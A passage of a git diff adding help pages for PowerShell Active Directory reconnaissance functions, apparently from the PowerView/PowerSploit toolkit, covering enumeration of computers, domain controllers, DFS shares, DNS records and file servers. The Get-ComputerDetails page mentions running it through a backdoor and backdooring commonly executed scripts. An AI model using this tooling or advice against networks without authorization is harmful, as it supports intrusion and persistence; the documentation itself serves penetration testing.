+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+Computer dnshostnames the current user has administrative access to.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ComputerDetails.md b/docs/Recon/Get-ComputerDetails.md
new file mode 100755
index 0000000..6bc3e91
--- /dev/null
+++ b/docs/Recon/Get-ComputerDetails.md
@@ -0,0 +1,68 @@
+# Get-ComputerDetails
+
+## SYNOPSIS
+This script is used to get useful information from a computer.
+
+Function: Get-ComputerDetails
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-ComputerDetails [-ToString]
+```
+
+## DESCRIPTION
+This script is used to get useful information from a computer.
+Currently, the script gets the following information:
+-Explicit Credential Logons (Event ID 4648)
+-Logon events (Event ID 4624)
+-AppLocker logs to find what processes are created
+-PowerShell logs to find PowerShell scripts which have been executed
+-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ComputerDetails
+```
+
+Gets information about the computer and outputs it as PowerShell objects.
+
+Get-ComputerDetails -ToString
+Gets information about the computer and outputs it as raw text.
+
+## PARAMETERS
+
+### -ToString
+Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
+You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
+
+## RELATED LINKS
+
+[Blog: http://clymb3r.wordpress.com/
+Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/
+Github repo: https://github.com/clymb3r/PowerShell)
+
diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md
new file mode 100755
index 0000000..aa8098c
--- /dev/null
+++ b/docs/Recon/Get-Domain.md
@@ -0,0 +1,81 @@
+# Get-Domain
+
+## SYNOPSIS
+Returns the domain object for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-Domain [[-Domain] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
+domain or the domain specified with -Domain X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Domain -Domain testlab.local
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Domain -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain name to query for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.Domain
+
+A complex .NET domain object.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)
+
diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md
new file mode 100755
index 0000000..562f769
--- /dev/null
+++ b/docs/Recon/Get-DomainComputer.md
@@ -0,0 +1,426 @@
+# Get-DomainComputer
+
+## SYNOPSIS
+Return all computers or specific computer objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainComputer [[-Identity] <String[]>] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN <String>]
+ [-OperatingSystem <String>] [-ServicePack <String>] [-SiteName <String>] [-Ping] [-Domain <String>]
+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all computer objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainComputer
+```
+
+Returns the current computers in current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer -SPN mssql* -Domain testlab.local
+```
+
+Returns all MS SQL servers in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained
+```
+
+Search the specified OU for computeres that allow unconstrained delegation.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainComputer -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+WINDOWS10$), DistinguishedName (e.g.
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.
+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g.
+windows10.testlab.local).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: SamAccountName, Name, DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Unconstrained
+Switch.
+Return computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TrustedToAuth
+Switch.
+Return computer objects that are trusted to authenticate for other principals.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Printers
+Switch.
+Return only printers.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SPN
+Return computers with a specific service principal name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePrincipalName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OperatingSystem
+Return computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServicePack
+Return computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SiteName
+Return computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Ping
+Switch.
+Ping each host to ensure it's up before enumerating.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Computer
+
+Custom PSObject with translated computer property fields.
+
+PowerView.Computer.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md
new file mode 100755
index 0000000..3d15f5c
--- /dev/null
+++ b/docs/Recon/Get-DomainController.md
@@ -0,0 +1,132 @@
+# Get-DomainController
+
+## SYNOPSIS
+Return the domain controllers for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-Domain
+
+## SYNTAX
+
+```
+Get-DomainController [[-Domain] <String>] [-Server <String>] [-LDAP] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the domain controllers for the current or specified domain.
+By default built in .NET methods are used.
+The -LDAP switch uses Get-DomainComputer
+to search for domain controllers.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainController -Domain 'test.local'
+```
+
+Determine the domain controllers for 'test.local'.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainController -Domain 'test.local' -LDAP
+```
+
+Determine the domain controllers for 'test.local' using LDAP queries.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'test.local' | Get-DomainController
+```
+
+Determine the domain controllers for 'test.local'.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainController -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+The domain to query for domain controllers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+Switch.
+Use LDAP queries to determine the domain controllers instead of built in .NET methods.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Computer
+
+Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.
+
+System.DirectoryServices.ActiveDirectory.DomainController
+
+If -LDAP isn't specified.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md
new file mode 100755
index 0000000..ce33275
--- /dev/null
+++ b/docs/Recon/Get-DomainDFSShare.md
@@ -0,0 +1,202 @@
+# Get-DomainDFSShare
+
+## SYNOPSIS
+Returns a list of all fault-tolerant distributed file systems
+for the current (or specified) domain.
+
+Author: Ben Campbell (@meatballs__)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+## SYNTAX
+
+```
+Get-DomainDFSShare [[-Domain] <String[]>] [[-SearchBase] <String>] [[-Server] <String>]
+ [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>] [-Tombstone]
+ [[-Credential] <PSCredential>] [[-Version] <String>]
+```
+
+## DESCRIPTION
+This function searches for all distributed file systems (either version
+1, 2, or both depending on -Version X) by searching for domain objects
+matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
+The server data is parsed appropriately and returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDFSShare
+```
+
+Returns all distributed file system shares for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDFSShare -Domain testlab.local
+```
+
+Returns all distributed file system shares for the 'testlab.local' domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainDFSShare -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Version
+{{Fill Version Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+A custom PSObject describing the distributed file systems.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md
new file mode 100755
index 0000000..e444fd5
--- /dev/null
+++ b/docs/Recon/Get-DomainDNSRecord.md
@@ -0,0 +1,181 @@
+# Get-DomainDNSRecord
+
+## SYNOPSIS
+Enumerates the Active Directory DNS records for a given zone.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord
+
+## SYNTAX
+
+```
+Get-DomainDNSRecord [-ZoneName] <String> [-Domain <String>] [-Server <String>] [-Properties <String[]>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Given a specific Active Directory DNS zone name, query for all 'dnsNode'
+LDAP entries using that zone as the search base.
+Return all DNS entry results
+and use Convert-DNSRecord to try to convert the binary DNS record blobs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDNSRecord -ZoneName testlab.local
+```
+
+Retrieve all records for the testlab.local zone.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDNSZone | Get-DomainDNSRecord
+```
+
+Retrieve all records for all zones in the current domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
+```
+
+Retrieve all records for all zones in the dev.testlab.local domain.
+
+## PARAMETERS
+
+### -ZoneName
+Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+The domain to query for zones, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DNSRecord
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md
new file mode 100755
index 0000000..7065b26
--- /dev/null
+++ b/docs/Recon/Get-DomainDNSZone.md
@@ -0,0 +1,156 @@
+# Get-DomainDNSZone
+
+## SYNOPSIS
+Enumerates the Active Directory DNS zones for a given domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainDNSZone [[-Domain] <String>] [-Server <String>] [-Properties <String[]>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDNSZone
+```
+
+Retrieves the DNS zones for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
+```
+
+Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
+
+## PARAMETERS
+
+### -Domain
+The domain to query for zones, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DNSZone
+
+Outputs custom PSObjects with detailed information about the DNS zone.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md
new file mode 100755
index 0000000..34e9f00
--- /dev/null
+++ b/docs/Recon/Get-DomainFileServer.md
@@ -0,0 +1,200 @@
+# Get-DomainFileServer
+
+## SYNOPSIS
+Returns a list of servers likely functioning as file servers.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+## SYNTAX
+
+```
+Get-DomainFileServer [[-Domain] <String[]>] [[-LDAPFilter] <String>] [[-SearchBase] <String>]
+ [[-Server] <String>] [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>]
+ [-Tombstone] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a list of likely fileservers by searching for all users in Active Directory
+with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
+the server names.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainFileServer
+```
+
+Returns active file servers for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainFileServer -Domain testing.local
+```
+
+Returns active file servers for the 'testing.local' domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
